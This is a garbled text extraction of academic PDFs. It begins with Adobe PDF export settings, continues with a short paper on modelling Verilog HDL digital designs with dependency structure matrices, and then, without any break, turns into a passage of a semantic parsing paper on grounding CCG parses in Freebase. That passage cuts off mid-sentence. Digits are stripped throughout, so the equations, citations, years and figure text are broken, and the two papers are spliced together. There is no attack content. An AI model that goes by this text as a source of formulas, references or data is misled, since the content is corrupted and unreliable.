e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network monitoring and controls volume , no. , dsm modelling for digital design using verilog hdl xing xue , yao chen , and junchao wei faculty of economics and management, shangluo university, shangluo, china, chenyao @gmail.com electronic information and electrical engineering college, shangluo university, shangluo, china, @ qq.com school of mechanical engineering, northwestern polytechnical university, xi’an , china, weijunchao@mail.nwpu.edu.cn abstract. in the practice of product design, the efficient control of complexity has increasingly gained importance. the dependency structure matrix (dsm) has proved to be a useful tool for analysing system structure and managing structural complexity. in order to provide a deep insight of system structure in designing verilog hdl source code artefacts for digital system designers and project managers, the paper proposes a dsm modelling method based on the characteristics of the digital system structural modelling with verilog and the component dependencies relationship. a dsm modelling example is presented. result shows that with the dsm model, the source code artefacts can be efficiently analyzed. keywords: design structure matrix, modeling, verilog hdl, digital design . introduction verilog-hdl can be used to model and design a digital system in a form of software programming. how to manage the complexity of source code artefacts is an issue for digital designers. structural considerations are an established approach to manage complexity [ , ]. a digital system can be decomposed into many sub-systems or modules. relationships between these modules exist. so system analysis is needed. the dsm[ , ] is a square matrix to identify the dependencies or relationships between components of a system. components of a system can be parts in a product, tasks of a project, and departments within an organization to be modelled. an n×n dsm has n elements with identical row and column labels and each entry of the dsm represents a particular kind of relationship, such as information flow, force flow, and so on. in the example dsm in fig. , elements are represented by the shaded elements along the diagonal. an off-diagonal mark signifies the dependency of one element on another. if element clk sends information to or influences the behaviour of element m , then the (row clk, columnm ) entry of the dsm contains a mark. of course, we can also use the binary relations and to represent the relationships between dsm elements. furthermore, other numerical values can present more detailed information, international journal of advanced network monitoring and controls volume , no. , such as the assessment of importance, rework probabilities, impact of changes, probability of changes, etc.[ ]. when a dsm is modelled, it is usually analyzed with clustering algorithms or other algorithms. through dsms, valuable insights from the system structure can be derived after examining the interactions within and among the subsystems. the dsm has been used in many fields, including the software field [ - ]; however, no paper is found to use dependency structure matrices (dsms) for digital design using verilog. this paper attempts to introduce the dsm to this field. the focus of the paper is how to model dsms for verilog hdl programs from a structural viewpoint without considering technical constraints. a simple analysis of system structure using dsms is illustrated. the rest of this paper is structured as follows. section reviews digital design using verilog. section sets up some rules to model the dsm. section presents an example model. finally, the paper proposes a conclusion. figure. example dsm . structural modelling using verilog hdl digital circuits are composed of interconnected components, such as logic gates and triggers. in most cases of the digital designs, models are used to express the digital circuits and the design work is done using cad tools. the design using verilog hdl embodies hierarchical and modular methodology. at every level of a hierarchical design, the efforts focus on the related level, and details of lower hierarchical levels are hidden, thus facilitating the complex design. this methodology helps to reuse the available modules or purchase ip modules. furthermore, this hierarchical composition makes functional verification easier. a structural model is composed of kinds of object instances [ ]: ) built-in primitives(and, or, xor, etc); ) user defined primitives (udp, such as mux ); and ) designed modules. instantiation refers to the formation of a high-level verilog module by connecting low-level logic primitives or modules. the instantiated object is called as instance. the structural modelling process is done using instantiation. a module is a basic unit in verilog hdl. it describes the function of a logic entity. the function of a module can be described separately, or through other instances of other modules. that is, a structural dsm modelling for digital design using verilog hdl module can include behaviour statements (such as always), continuous assignment statements (assign), build-in primitives, udps and other modules, or a combination of these objects. in this sense, a module describes a structure and behaviour of a hardware block in the form of software. a module includes ports as interfaces to exchange information with external environment. from a systematic and structural viewpoint, ports of a module can stand for this module. . dsm modelling for digital designs using verilog for a digital system design using verilog, the source code is a kind of design artefacts. components of this artefact can be module instances described above or other objects of interest, such as reg variables, wire variables, or always blocks. these components can be considered as elements of a dsm and relationships between these elements are defined by signal interaction or logical dependency. the dsm modelling procedure consists of three major steps: step : choose components of digital system according to the hierarchy level. step : represent these components in a dsm. for a verilog module instance, its port signal set stands for the module itself as a “macro” dsm element; for a block, a set of variables interacting with the outside of the block represent the block itself as a dsm element; a variable can be directly placed in the dsm. step : build up relationships between these elements in the dsm. these relationships depend on interface signal interactions or logical dependencies.for example, a variable on the left-hand side of an assignment statement depends on variables on the right-hand side. . example fig. shows a portion of fpga-based functions of a certain control card. there are several instantiated modules: ) sdac m (.startdac(startsdac), .dac_addr(sdac_addr), .dac_data(sdac_data), .dac_ clk(clk_ m), .dac_sck(sdac_sclk), .dac_sdo(sdac_sdo), .dac_csn(sdac_cs) ); // serial dac module ) m_pwm m (.clk(clk),.pwm_en(pwm_en),.count (count ), .count (count ),.q_pwm(pwm) ); // pwm module ) generator m m .clkin(clk), .clkout(clk_ m), .reset(reset) ); and there is a finite state machine as a block: always @(negedgeclkor posedgereset ) begin …… end international journal of advanced network monitoring and controls volume , no. , in addition, there is an assignment statement about nets reset_n and reset: assign reset_n = !reset; figure. system composition and module dependency in the example these three instantiated modules, the finite state machine block and variables reset_n and reset are chosen as elements for dsm elements. the dsm for these digital system can be obtained, as shown in fig. . from this model, it is shown that the net reset_n depends on the net reset. the behaviour of the finite state machine is dependent on the net clk and reset. all these relationships between elements are obviously signified by marks. if a condensed model is needed, interface signals for modules or the block can be hidden and only element names and relationships between these elements are preserved (see fig. ). however, many details are lost in this condensed version. a simple analysis of artefact architecture is degree analysis of elements [ ]. for example, clk and reset have high out-degrees, so these two elements have more impacts on others while m and m have no impact on others. figure. dsm modeling for the system in fig. dsm modelling for digital design using verilog hdl . conclusion dsms can reveal the relationships between components in a system in a concise way and provide designers with insight into the system. this paper set up some rules about building up dsms for digital design usingverilog-hdl. with the dsm model, the source code artefacts can be efficiently analyzed. references [ ] lindemann u., maurer m. & braun t., structural complexity management - an approach for the field of product design.berlin :springer, . [ ] biedermann,w.&lindemann,u., on the applicability of structural criteria in complexity management. th international conference on engineering design, iced , copenhagen, denmark, pp. - , . [ ] steward,d. v., the design structure system: a method for managing the design of complex systems. ieee transactions on engineering management, ( ).pp. – , . [ ]browning,t.r., applyingthedesignstructurematrixtosystemdecompositionandintegrationproblems:a reviewandnewdirections. ieeetransactionsonengineeringmanagement, ( ),pp. – , . [ ] lee, w.-t.,hsu, k.-h.&lee, j., designing software architecture with use case blocks using the design structure matrix, international symposium on computer, consumer and control,taichung, taiwan.pp. - , . [ ]sangal, n., jordan, e., sinha, v. &jackson, d.,using dependency models to manage complex software architecture. th annual acm conference on object-oriented programming, systems, languages, and applications, san diego, ca, united states. pp. - , . [ ]sosa, m. e., browning, t.&mihm, j., studying the dynamics of the architecture of software products. proceedings of the asme international design engineering technical conferences and computers and information in engineering conference, las vegas, nv, united states.pp. - , . [ ]lamantia, m. j.,cai, y.,maccormack,a.d.&rusnak, j.,analyzing the evolution of large-scale software systems using design structure matrices and design rule theory, th ieee/ifip working conference on software architecture, wicsa , vancouver, bc, canada .pp. - , . [ ]mirson, a.,skrypnyuk, o.,elezi, f.&lindemann, u.,mdm-based software modularization by analysing inter-project dependencies, th international dependency and structure modelling conference, cambridge, ma, united states.pp. - , . [ ] ashenden,p. j. ,digital design: an embedded systems approach using verilog. morgan kaufmann publishers, . [ ] cavanagh, j., verilog hdl: digital design and modelling.crc press, . [ ] sosa, m. e., eppinger, s. d., and rowles, c. m., , “a network approach to define modularity of components in complex products,” asme j. mech. des., ( ), pp. – . international journal of advanced network monitoring and controls volume , no. , author brief and sponsors xing xue, she received master degree in school of management from xi’an university of architecture and technology, xi’an, china, in . now she works at shangluo university. her current research interests include information management and information process. this work was supported by natural science foundation of shangluo city of shaanxi province of china and shangluo university (project no.sk - - , sk - - ) large-scale semantic parsing without question-answer pairs siva reddy, mirella lapata, mark steedman school of informatics, university of edinburgh crichton street, edinburgh eh ab siva.reddy@ed.ac.uk, mlap@inf.ed.ac.uk, steedman@inf.ed.ac.uk abstract in this paper we introduce a novel semantic parsing approach to query freebase in natu- ral language without requiring manual anno- tations or question-answer pairs. our key in- sight is to represent natural language via se- mantic graphs whose topology shares many commonalities with freebase. given this rep- resentation, we conceptualize semantic pars- ing as a graph matching problem. our model converts sentences to semantic graphs using ccg and subsequently grounds them to free- base guided by denotations as a form of weak supervision. evaluation experiments on a sub- set of the free and webquestions benchmark datasets show our semantic parser improves over the state of the art. introduction querying a database to retrieve an answer, telling a robot to perform an action, or teaching a com- puter to play a game are tasks requiring communi- cation with machines in a language interpretable by them. semantic parsing addresses the specific task of learning to map natural language (nl) to machine interpretable formal meaning representations. tra- ditionally, sentences are converted into logical form grounded in the symbols of some fixed ontology or relational database. approaches for learning semantic parsers have been for the most part supervised, using annotated training data consisting of sentences and their cor- responding logical forms (zelle and mooney, ; zettlemoyer and collins, ; wong and mooney, ; kwiatkowski et al., ). more recently, al- ternative forms of supervision have been proposed to alleviate the annotation burden, e.g., by learn- ing from conversational logs (artzi and zettlemoyer, ), from sentences paired with system behav- ior (chen and mooney, ; goldwasser and roth, question what is the capital of texas? logical form λx. city(x)∧capital(x,texas) answer {austin} figure : an example question with annotated logi- cal query, and its answer. ; artzi and zettlemoyer, ), via distant su- pervision (krishnamurthy and mitchell, ; cai and yates, ), from questions (goldwasser et al., ; poon, ; fader et al., ), and question- answer pairs (clarke et al., ; liang et al., ). indeed, methods which learn from question-answer pairs have been gaining momentum as a means of scaling semantic parsers to large, open-domain problems (kwiatkowski et al., ; berant et al., ; berant and liang, ; yao and van durme, ). figure shows an example of a question, its annotated logical form, and answer (or denotation). in this paper, we build a semantic parser that does not require example annotations or question-answer pairs but instead learns from a large knowledge base (kb) and web-scale cor- pora. specifically, we exploit freebase, a large community-authored knowledge base that spans many sub-domains and stores real world facts in graphical format, and parsed sentences from a large corpus. we formulate semantic parsing as a graph matching problem. we convert the output of an open-domain combinatory categorial gram- mar (ccg) parser (clark and curran, ) into a graphical representation and subsequently map it onto freebase. the parser’s graphs (also called un- grounded graphs) are mapped to all possible free- base subgraphs (also called grounded graphs) by re- placing edges and nodes with relations and types in freebase. each grounded graph corresponds to a unique grounded logical query. during learning, our semantic parser is trained to identify which kb sub- graph best corresponds to the nl graph. problem- capital(austin)∧unique(austin)∧capital.of.arg (e,austin)∧capital.of.arg (e,texas) (a) semantic parse of the sentence austin is the capital of texas. capital capital unique austin e texas ty p e capital. of.arg capital. of.arg unique(austin) ∧ capital(austin)∧ capital.of.arg (e, austin) ∧ capital.of.arg (e, texas) (b) ungrounded graph for semantic parse (a); unique means that austin is the only capital of texas. capital capital target x e texas ty p e capital. of.arg capital. of.arg target(x) ∧ capital(x) ∧ capital.of.arg (e, x) ∧ capital.of.arg (e, texas) {austin} (c) query graph after removing austin from graph (b) and its denotation. location .city capital target x m texas ty p e location. capital.arg location. capital.arg target(x) ∧ location.city(x) ∧ location.capital.arg (m, x) ∧ location.capital.arg (m, texas) location .city capital target x n texas ty p e location. containedby.arg location. containedby.arg target(x) ∧ location.city(x) ∧ location.containedby.arg (n, x) ∧ location.containedby.arg (n, texas) {austin} {austin, dallas, houston ... } (d) freebase graphs for nl graph (c) and their denotations. figure : steps involved in converting a natural language sentence to a freebase grounded graph. atically, ungrounded graphs may give rise to many grounded graphs. since we do not make use of manual annotations of sentences or question-answer pairs, we do not know which grounded graphs are correct. to overcome this, we rely on comparisons between denotations of natural language queries and related freebase queries as a form of weak supervi- sion in order to learn the mapping between nl and kb graphs. figure illustrates our approach for the sentence austin is the capital of texas. from the ccg syn- tactic derivation (which we omit here for the sake of brevity) we obtain a semantic parse (figure a) and convert it to an ungrounded graph (figure b). next, we select an entity from the graph and replace it with a variable x, creating a graph corresponding to the query what is the capital of texas? (figure c). the math function unique on austin in figure b indi- cates austin is the only value of x which can satisfy the query graph in figure c. therefore, the denota- tion of the nl query graph is {austin}. figure d shows two different groundings of the query graph in the freebase kb. we obtain these by replacing edges and nodes in the query graph with freebase relations and types. we use the denotation of the nl query as a form of weak supervision to select the best grounded graph. under the constraint that the denotation of a freebase query should be the same as the denotation of the nl query, the graph on the left hand-side of figure d is chosen as the correct grounding. experimental results on two benchmark datasets consisting of questions to freebase — free (cai and yates, ) and webquestions (berant the denotation of a graph is the set of feasible values for the nodes marked with target. et al., ) — show that our semantic parser im- proves over state-of-the-art approaches. our contri- butions include: a novel graph-based method to con- vert natural language sentences to grounded seman- tic parses which exploits the similarities in the topol- ogy of knowledge graphs and linguistic structure, to- gether with the ability to train using a wide range of features; a proposal to learn from a large scale web corpus, without question-answer pairs, based on denotations of queries from natural language statements as weak supervision; and the develop- ment of a scalable semantic parser which besides freebase uses clueweb for training, a corpus of . million webpages. our semantic parser can be downloaded from http://sivareddy.in/ downloads. framework our goal is to build a semantic parser which maps a natural language sentence to a logical form that can be executed against freebase. we begin with clueweb , a web-scale corpus automatically an- notated with freebase entities (gabrilovich et al., ). we extract the sentences containing at least two entities linked by a relation in freebase. we parse these sentences using a ccg syntactic parser, and build semantic parses from the syntactic out- put. semantic parses are then converted to seman- tic graphs which are subsequently grounded to free- base. grounded graphs can be easily converted to a kb query deterministically. during training we learn which grounded graphs correspond best to the natural language input. in the following, we pro- vide a brief introduction to freebase and its graph structure. next, we explain how we obtain seman- tic parses from ccg (section . ), how we convert them to graphs (section . ), and ground them in freebase (section . ). section presents our learn- ing algorithm. . the freebase knowledge graph freebase consists of million entities and . bil- lion facts. a fact is defined by a triple containing two entities and a relation between them. entities represent real world concepts, and edges represent relations, thus forming a graph-like structure. a freebase subgraph is shown in figure with usa natasha obama p q us president r s columbia university m barack obama n michelle obama m m n n education .university bachelor of arts h e a d q u a rt e rs .c o u n tr y h e a d q u a rt e rs .o rg a n is a ti o n person. nationality.arg person. nationality.arg pe rs on . pa re nt s. ar g pe rs on . pa re nt s. ar g p e rso n . p a re n ts.a rg p e rso n . p a re n ts.a rg education. institution education .student marriage .spouse marriage .spouse education .institution education .degree e d u c a ti o n .d e g re e e d u c a ti o n .s tu d e n t m arriage .from m arriage .spouse m a rr ia g e .f ro m m a rr ia g e .s p o u se ty p e ty p e figure : freebase knowledge graph. entities are represented by rectangles, relations between enti- ties by edges, mediator nodes by circles, types by rounded rectangles. rectangles denoting entities. in addition to sim- ple facts, freebase encodes complex facts, repre- sented by multiple edges (e.g., the edges connect- ing barack obama, columbia university and bachelor of arts). complex facts have in- termediate nodes called mediator nodes (circles in figure with the same identifiers e.g., m and n). for reasons of uniformity, we assume that simple facts are also represented via mediator nodes and split single edges into two with each subedge going from the mediator node to the target node (see per- son.nationality.arg and person.nationality.arg in fig- ure ). finally, freebase also has entity types defin- ing is-a relations. in figure types are represented by rounded rectangles (e.g., barack obama is of type us president, and columbia university is of type education.university). . combinatory categorial grammar the graph like structure of freebase inspires us to create a graph like structure for natural lan- guage, and learn a mapping between them. to do this we take advantage of the representational power of combinatory categorial grammar (steed- man, ). ccg is a linguistic formalism that tightly couples syntax and semantics, and can be used to model a wide range of language phenom- cameron directed titanic np (s\np)/np np cameron λyλx. directed.arg (e,x) titanic ∧ directed.arg (e,y) > s\np λx. directed.arg (e,x) ∧ directed.arg (e, titanic) < s directed.arg (e, cameron)∧ directed.arg (e, titanic) figure : ccg derivation containing both syntactic and semantic parse construction. ena. ccg is well known for capturing long-range dependencies inherent in constructions such as co- ordination, extraction, raising and control, as well as standard local predicate-argument dependencies (clark et al., ), thus supporting wide-coverage semantic analysis. moreover, due to the transparent interface between syntax and semantics, it is rela- tively straightforward to built a semantic parse for a sentence from its corresponding syntactic derivation tree (bos et al., ). in our case, the choice of syntactic parser is moti- vated by the scale of our problem; the parser must be broad-coverage and robust enough to handle a web-sized corpus. for these reasons, we rely on the c&c parser (clark and curran, ), a general- purpose ccg parser, to obtain syntactic deriva- tions. to our knowledge, we present the first at- tempt to use a ccg parser trained on treebanks for grounded semantic parsing. most previous work has induced task-specific ccg grammars (zettlemoyer and collins, , ; kwiatkowski et al., ). an example ccg derivation is shown in figure . semantic parses are constructed from syntac- tic ccg parses, with semantic composition be- ing guided by the ccg syntactic derivation. we use a neo-davidsonian (parsons, ) semantics to represent semantic parses. each word has a semantic category based on its syntactic cate- gory and part of speech. for example, the syn- tactic category for directed is (s\np)/np, i.e., it see bos et al. ( ) for a detailed introduction to semantic representation using ccg. neo-davidsonian semantics is a form of first-order logic that uses event identifiers (e) to connect verb predicates and their subcategorized arguments through conjunctions. titanic e cameron directed e e dir ec ted .ar g dir ect ed .ar g d ire c te d .in d ire c te d .a rg directed.arg directed.in directed.arg (e, cameron) ∧ directed.arg (e, titanic) ∧ directed.in(e, ) (a) ungrounded graph titanic m cameron directed n film .di rec ted by .ar g film .di rec ted by .ar g fi lm .in itia l re le a se d a te .a rg fi lm .in itia l re le a se d a te .a rg film.directed by.arg (m, cameron) ∧ film.directed by.arg (m, titanic) ∧ film.initial release date.arg (n, titanic) ∧ film.initial release date.arg (n, ) (b) grounded graph figure : graph representations for the sentence cameron directed titanic in . takes two argument nps and becomes s. to rep- resent its semantic category, we use a lambda term λyλx. directed.arg (e,x)∧ directed.arg (e,y), where e identifies the event of directed, and x and y are arguments corresponding to the nps in the syn- tactic category. we obtain semantic categories automatically us- ing the indexed syntactic categories provided by the c&c parser. the latter reveal the bind- ings of basic constituent categories in more com- plex categories. for example, in order to convert ((s\np)\(s\np))/np to its semantic category, we must know whether all nps have the same refer- ent and thus use the same variable name. the in- dexed category ((se\npx)\(se\npx))/npy reveals that there are only two different nps, x and y, and that one of them (i.e., x) is shared across two subcat- egories. we discuss the details of semantic category construction in the appendix. apart from n-ary predicates representing events (mostly verbs), we also use unary predicates repre- senting types in language (mostly common nouns and noun modifiers). for example, capital(austin) indicates austin is of type capital. prepositions, ad- jectives and adverbs are represented by predicates lexicalized with their head words to provide more information (see capital.of.arg instead of of.arg in figure a). . ungrounded semantic graphs we will now illustrate how we create ungrounded semantic graphs from ccg-derived semantic parses. figure a displays the ungrounded graph for the sen- who target directed x e the nutty professor directed.arg directed .arg target(x) ∧ directed.arg (e, x) ∧ directed.arg (e, thenuttyprofessor) (a) who directed the nutty professor? capital capital unique austin e texas capital .state state ty p e ty p e capital.of .arg capital.of .arg unique(austin) ∧ capital(austin) ∧ capital.state(austin) ∧ capital.of.arg (e, austin) ∧ capital.of.arg (e, texas) (b) austin is the state capital of texas. figure : ungrounded graphs with math functions target and unique. tence cameron directed titanic in . in order to construct ungrounded graphs topologically simi- lar to freebase, we define five types of nodes: word nodes (ovals) word nodes are denoted by ovals. they represent natural language words (e.g., directed in figure a, capital and state in fig- ure b). word nodes are connected to other word nodes via syntactic dependencies. for readability, we do not show inter-word dependencies. entity nodes (rectangles) entity nodes are denoted by rectangles and represent entities e.g., cameron in figure a. in cases where an entity is not known, we use variables e.g., x in figure a. entity variables are connected to their correspond- ing word nodes from which they originate by dotted links e.g., x in figure a is connected to the word node who. mediator nodes (circles) mediator nodes are de- noted by circles and represent events in language. they connect pairs of entities which participate in an event forming a clique (see the entities cameron, titanic and in figure a). we define an edge as a link that connects any two entities via a medi- ator. the subedge of an edge i.e., the link between a mediator and an entity, corresponds to the predi- cate denoting the event and taking the entity as its argument (e.g. directed.arg links e and cameron in figure a). mediator nodes are connected to their corresponding word nodes from which they origi- nate by dotted links e.g. mediators in figure a are connected to word node directed. type nodes (rounded rectangles) type nodes are denoted by rounded rectangles. they represent unary predicates in natural language. in figure b type nodes capital and capital.state are attached to austin denoting austin is of type capital and capi- tal.state. type nodes are also connected to their cor- responding word nodes from which they originate by dotted links e.g. type node capital.state and word node state in figure b. math nodes (diamonds) math nodes are denoted by diamonds. they describe functions to be applied on the nodes/subgraphs they attach to. the function target attaches to the entity variable of interest. for example, the graph in figure a represents the question who directed the nutty professor?. here, target attaches to x representing the word who. unique attaches to the entity variable modified by the definite article the. in figure b, unique at- taches to austin implying that only austin satisfies the graph. finally, count attaches to entity nodes which have to be counted. for the sentence julie an- drews has appeared in movies in figure , the kb could either link julie andrews and , with type node movies matching the grounded type integer, or it could link julie andrews to each movie she acted in and the count of these different movies add to . in anticipation of this ambiguity, we generate two semantic parses resulting in two ungrounded graphs (see figures a and b). we generate all possible grounded graphs corresponding to each ungrounded graph, and leave it up to the learning to decide which ones the kb prefers. . grounded semantic graphs we ground semantic graphs in freebase by mapping edge labels to relations, type nodes to entity types, and entity nodes to freebase entities. math nodes remain unchanged. though word nodes are not present in freebase, we retain them in our grounded graphs to extract sophisticated features based on words and grounded predicates. appeared movies movies julie andrews e appeared .arg appeared.in ty p e appeared.arg (e, julieandrews) ∧ appeared.in(e, ) ∧ movies( ) (a) ungrounded graph appeared movies movies julie andrews e z count appeared .arg appeared .in ty p e appeared.arg (e, julieandrews) ∧ appeared.in(e, z) ∧ movies(z) ∧ count(z, ) (b) alternate ungrounded graph appeared film movies julie andrews m z count performance .actor performance .film ty p e performance.actor(m, julieandrews) ∧ performance.film(m, z) ∧ film(z) ∧ count(z, ) (c) grounded graph figure : graph representations for the sentence julie andrews has appeared in movies. un- grounded graph (a) directly connects julie andrews and , whereas graph (b) uses the math func- tion count. ungrounded graph (b) and grounded graph (c) have similar topology. entity nodes previous approaches (cai and yates, ; berant et al., ; kwiatkowski et al., ) use a manual lexicon or heuristics to ground named entities to freebase entities. fortunately, clueweb sentences have been automatically annotated with freebase entities, so we use these an- notations to ground proper names to freebase enti- ties (denoted by uppercase words) e.g., cameron in figure a is grounded to freebase entity cameron in figure b. common nouns like movies (see fig- ure b) are left as variables to be instantiated by the entities satisfying the graph. type nodes type nodes are grounded to free- base entity types. type nodes capital and capi- tal.state in figure b are grounded to all possible types of austin (e.g., location.city, location.capital city, book.book subject, broadcast.genre). in cases where entity nodes are not grounded, (e.g., z in figure b), employees employees e alcoa has e e type ha s.a rg ha s.a rg h a s.in h a s. a rg has.arg has.in has.arg (e, alcoa) ∧ has.arg (e, ) ∧ has.in(e, ) ∧ employees( ) (a) ungrounded graph employees type.int m alcoa has m m type em plo ye r.n um be r of em plo ye es .in ve rse m ea su re m en t un it .d at ed in te ge r .n um be r m e a su re m e n t u n it .d a te d in te g e r .y e a r m e a su re m e n t u n it .d a te d in te g e r .n u m b e r employer.number of employees .inverse m easurem ent unit .dated integer .year employer.number of employees.inverse(m, alcoa) ∧ measurement unit.dated integer.number(m, ) ∧ measurement unit.dated integer.year(m, ) ∧ type.int( ) (b) grounded graph figure : graph representations for alcoa has employees in . we use an automatically constructed lexicon which maps ungrounded types to grounded ones (see sec- tion . for details). edges an edge between two entities is grounded using all edges linking the two entities in the knowl- edge graph. for example, to ground the edge be- tween titanic and cameron in figure , we use the following edges linking titanic and cameron in freebase: (film.directed by.arg , film.directed by.arg ), (film.produced by.arg , film.produced by.arg ). if only one entity is grounded, we use all possible edges from this grounded entity. if no entity is grounded, we use a mapping lexicon which is automatically created as described in section . . given an un- grounded graph with n edges, there are o((k + )n) possible grounded graphs, with k being the grounded edges in the knowledge graph for each ungrounded edge together with an additional empty (no) edge. mediator nodes in an ungrounded graph, media- tor nodes represent semantic event identifiers. in the grounded graph, they represent freebase fact identi- fiers. fact identifiers help distinguish if neighboring edges belong to a single complex fact, which may or may not be coextensive with an ungrounded event. in figure a, the edges corresponding to the event identifier e are grounded to a single complex fact in figure b, with the fact identifier m. however, in figure a, the edges of the ungrounded event e are grounded to different freebase facts, distinguished in figure b by the identifiers m and n. furthermore, the edge in a between cameron and is not grounded in b, since no freebase edge exists be- tween the two entities. we convert grounded graphs to sparql queries, but for readability we only show logical expressions. the conversion is deterministic and is exactly the inverse of the semantic parse to graph conversion (section . ). wherever a node/edge is instantiated with a grounded entity/type/relation in freebase, we use them in the grounded parse (e.g., type node cap- ital.state in figure b becomes location.capital city). math function target is useful in retrieving instan- tiations of entity variables of interest (see figure a). learning a natural language sentence may give rise to several grounded graphs. but only one (or a few) of them will be a faithful representation of the sentence in freebase. we next describe our algorithm for find- ing the best freebase graph for a given sentence, our learning model, and the features it uses. . algorithm freebase has a large number of relations and enti- ties, and as a result there are many possible grounded graphs g for each ungrounded graph u. we con- struct and score graphs incrementally, traversing each node in the ungrounded graph and matching its edges and types in freebase. given a nl sentence s, we construct from its ccg syntactic derivation all corresponding ungrounded graphs u. using a beam search procedure (described in section . ), we find the best scoring graphs (ĝ,û), maximizing over dif- ferent graph configurations (g,u) of s: (ĝ,û) = arg max g,u Φ(g,u,s,k b)·θ ( ) we define the score of (ĝ,û) as the dot product between a high dimensional feature representation Φ = (Φ ,...Φm) and a weight vector θ (see sec- tion . for details on the features we employ). we estimate the weights θ using the averaged structured perceptron algorithm (collins, ). as shown in algorithm , the perceptron makes sev- eral passes over sentences, and in each iteration it computes the best scoring (ĝ,û) among the candi- date graphs for a given sentence. in line , the al- gorithm updates θ with the difference (if any) be- algorithm : averaged structured perceptron input: training sentences: {si}ni= θ ← for t ← ...t do for i ← ...n do (ĝi,ûi) = arg max gi,ui Φ(gi,ui,si,k b)·θ if (u+i ,g + i ) = (ûi,ĝi) then θ ← θ + Φ(g+i ,u + i ,si,k b)−Φ(ĝi,ûi,si,k b) return t ∑ t t=i n ∑ n i= θ i t tween the feature representations of the best scoring graph (ĝ,û) and the gold standard graph (g+,u+). the goal of the algorithm is to rank gold standard graphs higher than the any other graphs. the final weight vector θ is the average of weight vectors over t iterations and n sentences. this averaging pro- cedure avoids overfitting and produces more stable results (collins, ). as we do not make use of question-answer pairs or manual annotations of sentences, gold standard graphs (g+,u+) are not available. in the following, we explain how we approximate them by relying on graph denotations as a form of weak supervision. . selecting surrogate gold graphs let u be an ungrounded semantic graph of s. we se- lect an entity e in u, replace it with a variable x, and make it a target node. let u+ represent the resulting ungrounded graph. next, we obtain all grounded graphs g+ which correspond to u+ such that the denotations [[u+]]k b = [[g +]]n l . we use these surrogate graphs g+as gold standard, and the pairs (u+,g+) for model training. there is con- siderable latitude in choosing which entity e to re- place. this can be done randomly, according to en- tity frequency, or some other criterion. we found that substituting the entity with the most connections to other entities in the sentence works well in prac- tice. all the entities that can replace x in u+ to con- stitute a valid fact in freebase will be the denotation of u+, [[u+]]n l . while it is straightforward to com- pute [[g+]]k b , it is hard to compute [[u +]]n l because of the mismatch between our natural language se- mantic language and the freebase query language. to ensure that graphs u+ and g+ have the same de- notations, we impose the following constraints: constraint if the math function unique is attached to the entity being replaced in the un- grounded graph, we assume the denotation of u+ contains only that entity. for example, in fig- ure b, we replace austin by x, and thus assume [[u+]]n l = {austin}. any grounded graph which results in [[g+]]k b = {austin} will be considered a surrogate gold graph. this allows us to learn entail- ment relations, e.g., capital.of should be grounded to location.capital (left hand-side graph in figure d) and not to location.containedby which results in all loca- tions in texas (right hand-side graph in figure d). constraint if the target entity node is a num- ber, we select the freebase graphs with denota- tion close to this number. for example, in fig- ure a if , is replaced by x, and we as- sume [[u+]]n l = { , }. however, the grounded graph b retrieves [[g+]]k b = { , }. we treat this as correct if β γ ∈ [ . , . ] where β ∈ [[u+]]n l and γ ∈ [[g+]]k b . integers can either occur directly in relation with an entity as in figure b, or must be enumerated as in figure c. constraint if the target entity node is a date, we select the grounded graph which results in the small- est set containing the date based on the intuition that most sentences in the data describe specific rather than general events. constraint if none of the above constraints ap- ply to the target entity e, we know e ∈ [[u+]]n l , and hence we select the grounded graphs which satisfy e ∈ [[g+]]k b as surrogate gold graphs. . features our feature vector Φ(g,u,s,k b) denotes the fea- tures extracted from a sentence s and its correspond- ing graphs u and g with respect to a knowledge base k b . the elements of the vector (φ , φ , . . . ) take integer values denoting the number of times a feature appeared. we devised the following broad feature classes: lexical alignments since ungrounded graphs are similar in topology to grounded graphs, we extract ungrounded and grounded edge we also remove unique attached to x to exactly mimic the test time 